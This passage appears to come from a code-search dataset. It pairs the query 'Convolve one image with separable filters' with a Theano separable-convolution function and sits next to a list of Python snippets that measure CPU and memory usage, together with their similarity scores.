[ "def get_total_cpu_time_and_memory_usage() -> Tuple[float, int]:\n me = resource.getrusage(resource.RUSAGE_SELF)\n children = resource.getrusage(resource.RUSAGE_CHILDREN)\n total_cpu_time = me.ru_utime + me.ru_stime + children.ru_utime + children.ru_stime\n total_memory_usage = me.ru_maxrss + children.ru_maxrss\n return total_cpu_time, total_memory_usage", "def _cpu_and_men_usage(processes):\n cpu_usage = 0\n mem_usage_mb = 0\n\n for process in processes:\n cpu_usage += process.cpu_percent()\n mem_usage_mb += process.memory_info().rss >> 20 # from bytes to Mb\n\n return cpu_usage, mem_usage_mb", "def getcpuusage(self):\n return ord(self.reg(0x11, write=1))", "def GetCpuStats(self, pid):\n class ProcTaskInfo(ctypes.Structure):\n \"\"\"Struct for proc_pidinfo() call.\"\"\"\n _fields_ = [(\"pti_virtual_size\", ctypes.c_uint64),\n (\"pti_resident_size\", ctypes.c_uint64),\n (\"pti_total_user\", ctypes.c_uint64),\n (\"pti_total_system\", ctypes.c_uint64),\n (\"pti_threads_user\", ctypes.c_uint64),\n (\"pti_threads_system\", ctypes.c_uint64),\n (\"pti_policy\", ctypes.c_int32),\n (\"pti_faults\", ctypes.c_int32),\n (\"pti_pageins\", ctypes.c_int32),\n (\"pti_cow_faults\", ctypes.c_int32),\n (\"pti_messages_sent\", ctypes.c_int32),\n (\"pti_messages_received\", ctypes.c_int32),\n (\"pti_syscalls_mach\", ctypes.c_int32),\n (\"pti_syscalls_unix\", ctypes.c_int32),\n (\"pti_csw\", ctypes.c_int32),\n (\"pti_threadnum\", ctypes.c_int32),\n (\"pti_numrunning\", ctypes.c_int32),\n (\"pti_priority\", ctypes.c_int32)]\n PROC_PIDTASKINFO = 4\n def __init__(self):\n self.size = ctypes.sizeof(self)\n super(ProcTaskInfo, self).__init__() # pylint: disable=bad-super-call\n\n proc_info = ProcTaskInfo()\n if not self.libproc:\n self.libproc = ctypes.CDLL(ctypes.util.find_library('libproc'))\n self.libproc.proc_pidinfo(pid, proc_info.PROC_PIDTASKINFO, 0,\n ctypes.byref(proc_info), proc_info.size)\n\n # Convert nanoseconds to seconds.\n cpu_time = (proc_info.pti_total_user / 1000000000.0 +\n proc_info.pti_total_system / 1000000000.0)\n results = {'CpuProcessTime': cpu_time,\n 'ContextSwitches': proc_info.pti_csw}\n\n # top only reports idle wakeup count starting from OS X 10.9.\n if self.GetOSVersionName() >= os_version_module.MAVERICKS:\n results.update({'IdleWakeupCount': self._GetIdleWakeupCount(pid)})\n return results", "def memory():\n\n mem_info = {}\n\n if platform.linux_distribution()[0]:\n with open('/proc/meminfo') as file:\n c = 0\n for line in file:\n lst = line.split()\n if str(lst[0]) == 'MemTotal:':\n mem_info['total'] = int(lst[1])\n elif str(lst[0]) in ('MemFree:', 'Buffers:', 'Cached:'):\n c += int(lst[1])\n mem_info['free'] = c\n mem_info['used'] = (mem_info['total']) - c\n elif platform.mac_ver()[0]:\n ps = subprocess.Popen(['ps', '-caxm', '-orss,comm'], stdout=subprocess.PIPE).communicate()[0]\n vm = subprocess.Popen(['vm_stat'], stdout=subprocess.PIPE).communicate()[0]\n\n # Iterate processes\n process_lines = ps.split('\\n')\n sep = re.compile('[\\s]+')\n rss_total = 0 # kB\n for row in range(1, len(process_lines)):\n row_text = process_lines[row].strip()\n row_elements = sep.split(row_text)\n try:\n rss = float(row_elements[0]) * 1024\n except:\n rss = 0 # ignore...\n rss_total += rss\n\n # Process vm_stat\n vm_lines = vm.split('\\n')\n sep = re.compile(':[\\s]+')\n vm_stats = {}\n for row in range(1, len(vm_lines) - 2):\n row_text = vm_lines[row].strip()\n row_elements = sep.split(row_text)\n vm_stats[(row_elements[0])] = int(row_elements[1].strip('\\.')) * 4096\n\n mem_info['total'] = 
rss_total\n mem_info['used'] = vm_stats[\"Pages active\"]\n mem_info['free'] = vm_stats[\"Pages free\"]\n else:\n raise('Unsupported Operating System.\\n')\n exit(1)\n\n return mem_info", "def get_cpu_usage():\n process_details = RU_OBJ.get_curr_processes()\n return json.dumps(sorted(process_details, key=lambda k: k['name']))", "async def sysinfo(self, ctx: Context):\n\t\tstart = time.perf_counter()\n\t\tend = time.perf_counter()\n\t\tduration = (end - start) * 1000\n\t\tcpuavg = psutil.cpu_percent(interval=None)\n\t\tmem = psutil.virtual_memory()[2]\n\t\tdurround = round(duration, 3)\n\t\tosun = os.uname()\n\t\tawait self.send(f\"System Info | CPU: {cpuavg}% | RAM: {mem}% | Latency: {durround * 1000}ms | OS: {sys.platform}\", whisper=[ctx.author.id])", "def read_cpu_usage():\n cpuInfo = OrderedDict()\n\n with open('/proc/stat') as f:\n for line in f:\n l = line.split()\n if len(l) < 5:\n continue\n if l[0].startswith('cpu'):\n cpuInfo[l[0]] = l\n\n return cpuInfo", "def cpu_usage(self):\n dsp = c_float()\n stream = c_float()\n geometry = c_float()\n update = c_float()\n total = c_float()\n ckresult(\n _dll.FMOD_System_GetCPUUsage(\n self._ptr,\n byref(dsp),\n byref(stream),\n byref(geometry),\n byref(update),\n byref(total),\n )\n )\n return so(\n dsp=dsp.value,\n stream=stream.value,\n geometry=geometry.value,\n update=update.value,\n total=total.value,\n )", "def memory_usage():\n\n # Handle optional psutil support\n try:\n import psutil\n\n psutil_version = version_tuple(psutil.__version__)\n if psutil_version < (0, 6, 0):\n usage = psutil.phymem_usage()\n used = usage.used\n else:\n usage = psutil.virtual_memory()\n used = usage.total - usage.available\n\n return used, usage.total\n\n except ImportError:\n pass\n\n return None, None", "def CPUStats(cls):\n\t\t# From <http://ubuntuforums.org/showthread.php?t=148781>\n\t\ttime_list = cat(\"/proc/stat\").split(\"\\n\")[0].split(\" \")[2:6]\n\t\tres = map(int, time_list)\n\t\tcls.LAST_CPU_STAT = res\n\t\treturn res", "def get_memory_usage():\n\n memory_usage = {'total' : 0, 'used' : 0}\n meminfo = subprocess.Popen(['free', '-m'], shell=False, stdout=subprocess.PIPE)\n meminfo.stdout.readline()\n total_used = meminfo.stdout.readline()\n memory_usage['total'] = total_used.split()[1]\n memory_usage['used'] = total_used.split()[2]\n return memory_usage", "def get_mem_usage():\n return process.memory_info().rss / 1024.**2", "def get_mem_usage():\n \n with open('/proc/meminfo') as f:\n for line in f:\n if line.startswith('MemTotal:'):\n mem_total = int(line.split()[1])\n elif line.startswith('MemFree:'):\n mem_free = int(line.split()[1])\n elif line.startswith('VmallocTotal:'):\n vm_total = int(line.split()[1])\n elif line.startswith('Cached:'):\n mem_cached = int(line.split()[1])\n \n return {\n 'total': mem_total,\n 'res': mem_total - mem_free,\n 'virt': vm_total,\n 'cached': mem_cached\n }", "def get_cpu_usage(self):\n\t\treturn call_sdk_function('PrlStatCpu_GetCpuUsage', self.handle)", "def get_cpu_usage():\n cpuInfo1 = read_cpu_usage()\n if not cpuInfo1:\n return None\n\n time.sleep(2)\n\n cpuInfo2 = read_cpu_usage()\n if not cpuInfo2:\n return None\n\n cpuUsage = OrderedDict()\n\n for key in cpuInfo1.keys():\n cpustr1 = cpuInfo1[key]\n cpustr2 = cpuInfo2[key]\n\n if len(cpustr1) >= 7 and len(cpustr2) >= 7:\n\n totalCPUTime1 = long(cpustr1[1]) + long(cpustr1[2]) + long(cpustr1[3]) + long(cpustr1[4]) + long(cpustr1[5]) + long(cpustr1[6]) + long(\n cpustr1[7])\n usedCPUTime1 = long(cpustr1[1]) + long(cpustr1[2]) + long(cpustr1[3])\n\n 
totalCPUTime2 = float(cpustr2[1]) + long(cpustr2[2]) + long(cpustr2[3]) + long(cpustr2[4]) + long(cpustr2[5]) + long(cpustr2[6]) + long(\n cpustr2[7])\n usedCPUTime2 = float(cpustr2[1]) + long(cpustr2[2]) + long(cpustr2[3])\n\n cpuPct = round((usedCPUTime2 - usedCPUTime1) * 100 / (totalCPUTime2 - totalCPUTime1), 2)\n cpuUsage[key] = cpuPct\n\n return cpuUsage", "def get_cpu_usage(cls):\n\n cpu_stats = psutil.cpu_times_percent(percpu=False)\n cpu_stats_dict = { StatsKeys.CPU :\n {\n StatsKeys.IDLE : cpu_stats.idle,\n StatsKeys.SYSTEM : cpu_stats.system,\n StatsKeys.USER : cpu_stats.user,\n StatsKeys.COUNT : len(psutil.cpu_times(percpu=True))\n }\n }\n logger.debug(\"CPU stats: {}\".format(cpu_stats_dict))\n\n return cpu_stats_dict", "def cpuinfo(self):\n \n command = 'cat /proc/cpuinfo'\n\tpipe = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n stdout, stderr = pipe.communicate()\n\tinfo = stdout.strip()\n cpu_type = None\n\tn_proc = 0\n\tfor line in info.split('\\n'):\n if 'model name' in line:\n\t n_proc += 1\n if cpu_type is None:\n\t\t cpu_type = ' '.join(line.split(':')[-1].strip().split())\n\t\n\treturn (cpu_type, n_proc)", "def get_cpu_usage():\n return psutil.cpu_percent()", "def cpu_times():\n \n with open(Path.proc_stat()) as f:\n line = f.readline()\n \n cpu_times = [int(x) for x in line.split()[1:]]\n \n return cpu_times", "def get_current_mem_usage():\n process = psutil.Process()\n return process.memory_info().rss / float(2**20)", "def memavail() -> tuple:\n with open('/proc/meminfo') as m:\n info = [ _.split() for _ in m.read().split('\\n') ]\n\n return float(info[2][1])/float(info[0][1]) , int(info[0][1]) << 10", "def cpu_usage():\n return str(_cpu_usage())", "def get_cpu_usage(conn):\n prev_idle = 0\n prev_total = 0\n cpu = conn.getCPUStats(-1, 0)\n if type(cpu) == dict:\n for num in range(2):\n idle = list(conn.getCPUStats(-1, 0).values())[1]\n total = sum(list(conn.getCPUStats(-1, 0).values()))\n diff_idle = idle - prev_idle\n diff_total = total - prev_total\n diff_usage = (1000 * (diff_total - diff_idle) / diff_total + 5) / 10\n prev_total = total\n prev_idle = idle\n if num == 0:\n time.sleep(1)\n else:\n if diff_usage < 0:\n diff_usage = 0\n else:\n return {'usage': None}\n return {'usage': diff_usage}", "def _get_sys_per_cpu_times():\r\n cpus = []\r\n f = open('/proc/stat', 'r')\r\n # get rid of the first line who refers to system wide CPU stats\r\n try:\r\n f.readline()\r\n for line in f.readlines():\r\n if line.startswith('cpu'):\r\n values = line.split()[1:8]\r\n values = tuple([float(x) / _CLOCK_TICKS for x in values])\r\n entry = nt_sys_cputimes(*values[:7])\r\n cpus.append(entry)\r\n return cpus\r\n finally:\r\n f.close()", "def get_cpu_usage(*args):\n \n keys = ['us', 'ni', 'sy', 'id', 'wa', 'hi', 'si', 'st'] #usage % to be returned\n \n with open('/proc/stat') as f1:\n with open('/proc/stat') as f2:\n content1 = f1.read() #first collection\n yield {} #yield so that caller can put delay before sampling again\n content2 = f2.read() #second collection\n \n cpu_count = multiprocessing.cpu_count() #total number of cpu cores available\n lines1, lines2 = content1.splitlines(), content2.splitlines()\n data, deltas = {}, {}\n \n #if only one cpu available, read only the first line, else read total cpu count lines starting from the second line\n i, cpu_count = (1, cpu_count + 1) if cpu_count > 1 else (0, 1)\n \n #extract deltas\n while i < cpu_count:\n line_split1 = lines1[i].split()\n line_split2 = lines2[i].split()\n 
deltas[line_split1[0]] = [int(b) - int(a) for a, b in zip(line_split1[1:], line_split2[1:])]\n i += 1\n \n for key in deltas:\n #calculate the percentage\n total = sum(deltas[key])\n data[key] = dict(zip(keys, [100 - (100 * (float(total - x) / total)) for x in deltas[key]]))\n \n yield data", "def _get_mem_info(self):\n memory_usage_pct = None\n try:\n memory_usage = self._get_cgroups_current_memory_usage()\n if self._max_memory_usage and memory_usage:\n memory_usage_pct = round((memory_usage / self._max_memory_usage) * 100, 1)\n except BaseException:\n self._log.warning(f'Unable to determine memory usage', exc_info=True)\n return memory_usage_pct", "def cpu_info():\n \n with open(Path.proc_cpuinfo()) as f:\n cpuinfo = {'processor_count': 0}\n for line in f:\n if ':' in line:\n fields = line.replace('\\t', '').strip().split(': ')\n # count processores and filter out core specific items\n if fields[0] == 'processor':\n cpuinfo['processor_count'] += 1\n elif fields[0] != 'core id':\n try:\n cpuinfo[fields[0]] = fields[1]\n except IndexError:\n pass\n return cpuinfo", "def do_stats(self, args):\n total_cpu = free_cpu = in_use_cpu = 0\n\n summary = self._qm.get_all_host_summary()\n for host_id, host_info in summary.viewitems():\n host_cpu = int(host_info['total cores'])\n total_cpu += host_cpu\n locked = host_info.get('locked by')\n if locked:\n # If host is locked then all CPUs are in use.\n in_use_cpu += host_cpu\n else:\n free_host_cpu = int(host_info['free cores'])\n in_use_cpu += (host_cpu - free_host_cpu)\n free_cpu += free_host_cpu\n\n print('total CPU: ', total_cpu)\n print('used/locked CPU: ', in_use_cpu)\n print('free CPU: ', free_cpu)\n capacity = float(in_use_cpu) / float(total_cpu)\n print('capacity used: %.1f%%' % (capacity * 100,))\n capacity = float(free_cpu) / float(total_cpu)\n print('capacity remaining: %.1f%%' % (capacity * 100,))", "def cpu_usage(self):\n usages = []\n for w, info in self.worker_info.items():\n usages.append(info['metrics']['cpu'])\n if len(usages)>0:\n return sum(usages) / len(usages)\n else:\n return 0" ]
[ "0.8176625", "0.7808941", "0.7579237", "0.7543515", "0.7478074", "0.7445209", "0.73848224", "0.73599404", "0.7351578", "0.73352563", "0.73092437", "0.73081726", "0.72933537", "0.72700363", "0.7250576", "0.72455794", "0.7233994", "0.7216275", "0.7215389", "0.71842796", "0.71518236", "0.7146915", "0.7068975", "0.70229685", "0.7021479", "0.7020686", "0.7017738", "0.6983417", "0.69466054", "0.69461554" ]
0.78645474
1
Convolve one image with separable filters.
def convolve_one_image(self,input4D, one_image, image_shape, Pstruct, filter_shape, image_index, channel_index): ## We look at the composition for the first channel in the beginning rank = Pstruct[0]['U1'].shape[1] fwidth = filter_shape[2] fheight = filter_shape[3] # Construct horizontal filters #TODO save the filters in the correct shape horizontal_filter_shape = (rank, 1, fwidth) horizontal_filters = np.ndarray(horizontal_filter_shape) horizontal_filters[:, 0, :] = np.transpose(Pstruct[channel_index]['U1']); # Output is 1 x rank x W x H horizontal_conv_out = conv.conv2d(input=one_image, filters = horizontal_filters, filter_shape = horizontal_filter_shape, image_shape = image_shape) # Construct vertical filters vertical_filter_shape = (rank, fheight, 1) vertical_filters = np.ndarray(vertical_filter_shape) vertical_filters[:,:, 0] = np.transpose(Pstruct[channel_index]['U2']); initial_n_rows = image_shape[1] final_n_rows = initial_n_rows- fwidth + 1 final_n_cols = image_shape[2] - fheight + 1 conv_out = theano.shared(np.zeros((rank, final_n_rows, final_n_cols))) for r in range(rank): # temp is 1x1x imageW x imageH A = conv.conv2d(input = horizontal_conv_out[:,r,:,:], filters = vertical_filters[r,:,:], filter_shape = (1, fheight, 1), image_shape = (1, initial_n_rows, final_n_cols)) conv_out = T.set_subtensor(conv_out[r,:,:], A[0,:,:]) nbr_filters = Pstruct[0]['U3'].shape[0] # Final number of rows and columns ## numberof images, number of filters, image width, image height alphas = Pstruct[channel_index]['U3'] for f in range(nbr_filters): temp = theano.shared(np.zeros((final_n_rows, final_n_cols))) for r in range(rank): temp = temp + conv_out[r, :,:]* alphas[f, r] * Pstruct[channel_index]['lmbda'][r]; input4D =T.set_subtensor(input4D[image_index,f,:,:], temp) return input4D
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def convolve(self, *args, **kwargs):\n return _image.image_convolve(self, *args, **kwargs)", "def MyConvolve(img, ff):\n result = np.zeros(img.shape)\n x_len = img.shape[0]\n y_len = img.shape[1]\n\n ff = np.flipud(np.fliplr(ff)) # Flip filters\n\n # Apply filter to pixels\n for x in range(1, x_len - 1):\n for y in range(1, y_len - 1):\n # Left column\n top_left = img[x - 1, y - 1] * ff[0, 0]\n left = img[x, y - 1] * ff[1, 0]\n btm_left = img[x + 1, y - 1] * ff[2, 0]\n # Middle column\n top = img[x - 1, y] * ff[0, 1]\n middle = img[x, y] * ff[1, 1]\n btm = img[x + 1, y] * ff[2, 1]\n # Right column\n top_right = img[x - 1, y + 1] * ff[0, 2]\n right = img[x, y + 1] * ff[1, 2]\n btm_right = img[x + 1, y + 1] * ff[2, 2]\n\n result[x, y] = top_left + left + btm_left + top + middle + btm + top_right + right + btm_right\n\n return result", "def apply_filter(image: np.ndarray) -> np.ndarray:\n # choose filters to apply\n return clahe(image)", "def convolve(img, fltr, same=False, stri=1, pad=0, repfilter=False):\n # focus = np.array{eltype(img),2} # scope outside of if block\n if np.ndim(img) == 3:\n imgd, imgx, imgy = np.shape(img)\n elif np.ndim(img) == 2:\n imgx, imgy = np.shape(img)\n imgd = 1\n else:\n print(\"Wrong dimensions of image file. Quitting.\")\n return\n\n if np.ndim(fltr) == 3:\n fd, fx, fy = np.shape(fltr)\n elif np.ndim(fltr) == 2:\n fx, fy = np.shape(fltr)\n fd = 1\n else:\n print(\"Wrong dimensions of filter. Quitting.\")\n return\n\n if fd != imgd: # as a convenience we could just replicate the 2d filter...\n print(\"Depths of image and filter not equal. Quitting.\")\n return\n\n if same:\n pad = math.ceil((fx - 1) / 2)\n\n if pad > 0:\n img = dopad(img, pad)\n\n # dimensions of the result of convolution\n x_out = (imgx + 2 * pad - fx) // stri + 1\n y_out = (imgy + 2 * pad - fy) // stri + 1\n\n # print(imgx, imgy)\n\n ret = np.zeros((x_out, y_out))\n if imgd > 1: # slice through the depth, the zeroth (first) dimension\n for i in zip(range(x_out), range(0, imgx, stri)):\n for j in zip(range(y_out), range(0, imgy, stri)):\n ret[i[0], j[0]] = np.sum(img[:, i[1]:i[1] + fx, j[1]:j[1] +\n fy] * fltr)\n else:\n for i in zip(range(x_out), range(0, imgx, stri)):\n for j in zip(range(y_out), range(0, imgy, stri)):\n ret[i[0], j[0]] = np.sum(img[i[1]:i[1] + fx, j[1]:j[1] +\n fy] * fltr)\n return ret", "def _apply_image_filters(self, image, filters=[]):\n derivative = image\n for filter in filters:\n derivative = filter(derivative)\n return derivative", "def deconvolve(self, img, psf):\n self.data = pysap.Image(data=self.deconv.deconvolve(img, psf))", "def convolve(image, pixel_filter, channels=3, name=None):\n with tf.name_scope(name, 'convolve'):\n tf.compat.v1.assert_type(image, tf.float32)\n channel_filter = tf.eye(channels)\n filter_ = (tf.expand_dims(tf.expand_dims(pixel_filter, -1), -1) *\n tf.expand_dims(tf.expand_dims(channel_filter, 0), 0))\n result_batch = tf.nn.conv2d(tf.stack([image]), # batch\n filter=filter_,\n strides=[1, 1, 1, 1],\n padding='SAME')\n return result_batch[0] # unbatch", "def image_conv(image, kernel):\n \n # Filter2D used for performance\n return cv2.filter2D(image, -1, kernel)", "def img_conv(X, filter):\n assert filter.shape[0] % 2 == 1\n assert filter.shape[1] % 2 == 1\n x_size = filter.shape[0] // 2\n y_size = filter.shape[1] // 2\n w = X.shape[0]\n h = X.shape[1]\n out = numpy.zeros(X.shape)\n for r in range(w):\n for c in range(h):\n for x in range(filter.shape[0]):\n pixel_x = r + x - x_size\n if pixel_x < 0:\n pixel_x = -pixel_x\n if pixel_x >= 
w:\n pixel_x = w - pixel_x - 2\n for y in range(filter.shape[1]):\n pixel_y = c + y - y_size\n if pixel_y < 0:\n pixel_y = -pixel_y\n if pixel_y >= h:\n pixel_y = h - pixel_y - 2\n #if pixel_x >= 0 and pixel_x < w and pixel_y >= 0 and pixel_y < h:\n out[r, c] += filter[x, y] * X[pixel_x, pixel_y]\n return out", "def apply_filter(self, image):\n pass", "def __init__(self, filter1x1, ker_size, filters):\n super(reduce, self).__init__()\n self.con1 = layers.Conv2D(\n filter1x1, kernel_size=1, padding=\"same\", activation=\"relu\"\n )\n self.conv = layers.Conv2D(\n filters, kernel_size=ker_size, padding=\"same\", activation=\"relu\"\n )", "def convolve(self, psf):\n if self.image is None or psf.image is None:\n raise ValueError('Both images to convolve have to be initialized!')\n self.image = fftconvolve(self.image, psf.image, mode='full')\n self.image = rescale_intensity(self.image, out_range=(0, 255))\n self.metadata['Convolved'] = True\n return self.image", "def convolveAndDownsample(img):\n # Select every other pixel from G\n G = sp.signal.convolve2d(img, guassianFilter, 'same')\n return G[::2, ::2]", "def convolve_grayscale_same(images, kernel):\n imgshape = images.shape\n h = images.shape[1]\n w = images.shape[2]\n kh = kernel.shape[0]\n kw = kernel.shape[1]\n # conved = np.zeros((imgshape[0], h - kh + 1, w - kw + 1))\n conved = np.zeros(imgshape)\n ph = int((kh) / 2)\n pw = int((kw) / 2)\n # print(conved.shape)\n # print(kernel.shape, images.shape)\n # print(kernel[None, :, :].shape)\n padimg = np.pad(images, ((0, 0), (ph, ph), (pw, pw)), 'constant',\n constant_values=0)\n for i in range(0, h):\n for j in range(0, w):\n subs = padimg[:, i:i + kh, j:j + kw]\n # ip = i + ph\n # jp = j + pw\n conved[:, i, j] = np.sum((kernel[None, :, :] * subs),\n axis=(1, 2))\n\n return conved", "def custom_filter(image: Image) -> Image:\n image = image.filter(ImageFilter.Kernel(\n size=(3, 3), kernel=(1, 0, 1, 0, 0, 0, 1, 0, 1)))\n return image", "def convolve_grayscale_same(images, kernel):\n m = images.shape[0]\n h = images.shape[1]\n w = images.shape[2]\n kh = kernel.shape[0]\n kw = kernel.shape[1]\n padh = int(kh / 2)\n padw = int(kw / 2)\n pad = ((0, 0), (padh, padh), (padw, padw))\n conv = np.zeros([m, h, w])\n imagePad = np.pad(images, pad_width=pad, mode='constant')\n for i in range(h):\n for j in range(w):\n image = imagePad[:, i:i+kh, j:j+kw]\n conv[:, i, j] = np.multiply(image, kernel).sum(axis=(1, 2))\n return conv", "def forward(self, image):\n height, width = image.shape\n H_out, W_out = output_shape(height, width, self.filter_size, self.padding, self.stride)\n output = np.zeros((H_out, W_out, self.num_filters))\n padded_image = pad_2d(image, self.padding)\n for patch, i, j in self.image_patch(padded_image):\n output[i,j] = np.sum(patch*self.conv_filter, axis=(1,2))\n return output", "def convolve_grayscale_same(images, kernel):\n\n # num images\n n_images = images.shape[0]\n\n # input_width and input_height\n i_h = images.shape[1]\n i_w = images.shape[2]\n\n # kernel_width and kernel_height\n\n k_h = kernel.shape[0]\n k_w = kernel.shape[1]\n\n # pad_h ⊛ = int (k_h - 1)/2\n # pad_w ⊛ = int (k_w - 1)/2\n p_h = int((k_h - 1) / 2)\n p_w = int((k_w - 1) / 2)\n\n if k_h % 2 == 0:\n p_h = int(k_h / 2)\n\n if k_w % 2 == 0:\n p_w = int(k_w / 2)\n\n # output_height and output_width\n # H = i_h + 2pad - k_h + 1, W = i_w + 2pad - k_w + 1\n o_h = i_h + 2 * p_h - k_h + 1\n o_w = i_w + 2 * p_w - k_w + 1\n\n if k_h % 2 == 0:\n o_h = i_h + 2 * p_h - k_h\n\n if k_w % 2 == 0:\n o_w = i_w + 2 * p_w - k_w\n\n 
# creating outputs of size: n_images, o_h x o_w\n outputs = np.zeros((n_images, o_h, o_w))\n\n # creating pad of zeros around the output images\n padded_imgs = np.pad(images,\n pad_width=((0, 0), (p_h, p_h), (p_w, p_w)),\n mode=\"constant\",\n constant_values=0)\n\n # vectorizing the n_images into an array\n imgs_arr = np.arange(0, n_images)\n\n # iterating over the output array and generating the convolution\n for x in range(o_h):\n for y in range(o_w):\n x1 = x + k_h\n y1 = y + k_w\n outputs[imgs_arr, x, y] = np.sum(np.multiply(\n padded_imgs[imgs_arr, x: x1, y: y1], kernel), axis=(1, 2))\n\n return outputs", "def filtering(image):\n output = np.array(image)\n for x in xrange(0,1):\n bilateralFilter_img = cv2.bilateralFilter(output,5, 75, 75)\n\n return bilateralFilter_img", "def convolve_im(im: np.array,\n kernel: np.array,\n verbose=True):\n\t\n ### START YOUR CODE HERE ### (You can change anything inside this block) \n\t\n H,W = np.shape(im)\n h,w = np.shape(kernel)\n t_b = (H-h)//2\n l_r = (W-w)//2\n kernel_padded = np.pad(kernel, ((t_b, t_b+1),(l_r, l_r+1)), 'constant')\n kernel_padded = np.pad(kernel, ((0, 2*t_b),(0, 2*l_r)), 'constant')\n fft_kernel = np.fft.fft2(kernel_padded, s=None, axes=(-2, -1), norm=None)\n \n \n im_fft = np.fft.fft2(im, s=None, axes=(-2, -1), norm=None) \n im_filt = im_fft*fft_kernel \n conv_result = np.fft.ifft2(im_filt, s=None, axes=(-2, -1), norm=None).real \n\n if verbose:\n # Use plt.subplot to place two or more images beside eachother\n plt.figure(figsize=(12, 4))\n # plt.subplot(num_rows, num_cols, position (1-indexed))\n plt.subplot(1, 2, 1)\n plt.imshow(im, cmap=\"gray\")\n plt.subplot(1, 2, 2) \n plt.imshow(conv_result, cmap=\"gray\")\n\n ### END YOUR CODE HERE ###\n return conv_result", "def convolve_grayscale_valid(images, kernel):\n imgshape = images.shape\n h = images.shape[1]\n w = images.shape[2]\n kh = kernel.shape[0]\n kw = kernel.shape[1]\n conved = np.zeros((imgshape[0], h - kh + 1, w - kw + 1))\n\n for i in range(0, h - kh + 1):\n for j in range(0, w - kw + 1):\n subs = images[:, i:i + kh, j:j + kw]\n conved[:, i, j] = np.sum((kernel[None, :, :] * subs),\n axis=(1, 2))\n\n return conved", "def convolve_channels(images, kernel, padding='same', stride=(1, 1)):\n m = images.shape[0]\n image_h = images.shape[1]\n image_w = images.shape[2]\n filter_h = kernel.shape[0]\n filter_w = kernel.shape[1]\n s1 = stride[0]\n s2 = stride[1]\n\n if padding == 'valid':\n pad_h = 0\n pad_w = 0\n\n if padding == 'same':\n pad_h = int(((image_h - 1) * s1 + filter_h - image_h) / 2) + 1\n pad_w = int(((image_w - 1) * s2 + filter_w - image_w) / 2) + 1\n\n if type(padding) == tuple:\n pad_h = padding[0]\n pad_w = padding[1]\n\n n_dim1 = int((image_h + 2 * pad_h - filter_h) / stride[0]) + 1\n n_dim2 = int((image_w + 2 * pad_w - filter_w) / stride[1]) + 1\n convolve = np.zeros((m, n_dim1, n_dim2))\n new_images = np.pad(images, ((0, 0), (pad_h, pad_h), (pad_w, pad_w),\n (0, 0)), mode='constant')\n for x in range(n_dim1):\n for y in range(n_dim2):\n mini_matrix = new_images[:, x * s1: x * s1 + filter_h,\n y * s2: y * s2 + filter_w, :]\n values = np.sum(mini_matrix * kernel,\n axis=1).sum(axis=1).sum(axis=1)\n convolve[:, x, y] = values\n return (convolve)", "def _valid_convolve(images: th.Tensor, kernels: th.Tensor) -> th.Tensor:\n ret = F.conv2d(images.view((images.shape[0], *images.shape[-3:])).transpose(1, 0),\n th.flip(kernels.view((kernels.shape[0], *kernels.shape[-3:])), dims=(-1, -2)),\n groups=kernels.shape[0]).transpose(1, 0)\n return ret", "def 
pipeline(filters):\n pipe = partial(reduce, lambda acc, f: f(acc), filters)\n bil = bilateral()\n\n def procme(img):\n img = bil(img)\n return pipe(img)\n\n return lambda img: map(procme, [img[:, :, 0], img[:, :, 1], img[:, :, 2]])", "def conv2d(input, filters, image_shape=None, filter_shape=None,\r\n border_mode='valid', subsample=(1, 1), **kargs):\r\n\r\n #accept Constant value for image_shape and filter_shape.\r\n if image_shape is not None:\r\n image_shape = list(image_shape)\r\n for i in xrange(len(image_shape)):\r\n if image_shape[i] is not None:\r\n try:\r\n image_shape[i] = get_scalar_constant_value(\r\n as_tensor_variable(image_shape[i]))\r\n except NotScalarConstantError, e:\r\n raise NotScalarConstantError(\r\n \"The convolution need that the shape\"\r\n \" information are constant values. We got\"\r\n \" %s for the image_shape parameter\" %\r\n image_shape[i])\r\n assert str(image_shape[i].dtype).startswith('int')\r\n image_shape[i] = int(image_shape[i])\r\n if filter_shape is not None:\r\n filter_shape = list(filter_shape)\r\n for i in xrange(len(filter_shape)):\r\n if filter_shape[i] is not None:\r\n try:\r\n filter_shape[i] = get_scalar_constant_value(\r\n as_tensor_variable(filter_shape[i]))\r\n except NotScalarConstantError, e:\r\n raise NotScalarConstantError(\r\n \"The convolution need that the shape\"\r\n \" information are constant values. We got\"\r\n \" %s for the filter_shape \"\r\n \"parameter\" % filter_shape[i])\r\n assert str(filter_shape[i].dtype).startswith('int')\r\n filter_shape[i] = int(filter_shape[i])\r\n\r\n if image_shape and filter_shape:\r\n try:\r\n assert image_shape[1] == filter_shape[1]\r\n except Exception:\r\n print 'image ', image_shape, ' filters ', filter_shape\r\n raise\r\n\r\n if filter_shape is not None:\r\n nkern = filter_shape[0]\r\n kshp = filter_shape[2:]\r\n else:\r\n nkern, kshp = None, None\r\n\r\n if image_shape is not None:\r\n bsize = image_shape[0]\r\n imshp = image_shape[1:]\r\n else:\r\n bsize, imshp = None, None\r\n\r\n op = ConvOp(output_mode=border_mode, dx=subsample[0], dy=subsample[1],\r\n imshp=imshp, kshp=kshp, nkern=nkern, bsize=bsize, **kargs)\r\n\r\n return op(input, filters)", "def clConvolution(self, size, mask):", "def convolve(img, fourier_kernel):\n return np.fft.ifftshift(np.fft.irfft2(np.fft.rfft2(img) * fourier_kernel))", "def compute_output(self, input_images, filter_shape, image_shape, poolsize=(2, 2), \n Pstruct = None, b= None):\n\n assert image_shape[1] == filter_shape[1]\n # the bias is a 1D tensor -- one bias per output feature map\n # convolve input feature maps with filters\n\n\n batch_size = image_shape[0] \n fwidth = Pstruct[0]['U1'].shape[0]\n fheight = Pstruct[0]['U2'].shape[0]\n nbr_channels = image_shape[1]\n nbr_filters = Pstruct[0]['U3'].shape[0]\n initial_n_rows = image_shape[2]\n initial_n_cols = image_shape[3]\n \n # Final number of rows and columns \n final_n_rows = initial_n_rows - fwidth + 1\n final_n_cols = initial_n_cols - fheight + 1\n # The convolved input images\n input4D = theano.shared(np.zeros((batch_size, nbr_filters, \n final_n_rows, final_n_cols)))\n print 'batch size ', batch_size \n one_image_shape = (1, initial_n_rows, initial_n_cols)\n # assert one_image_shape == (1,28,28)\n for image_index in range(batch_size):\n for channel_index in range(nbr_channels):\n # Convolve image with index image_index in the batch\n input4D = self.convolve_one_image(input4D, \n input_images[image_index,channel_index,:,:].reshape((1, initial_n_rows, initial_n_cols)),\n one_image_shape,\n 
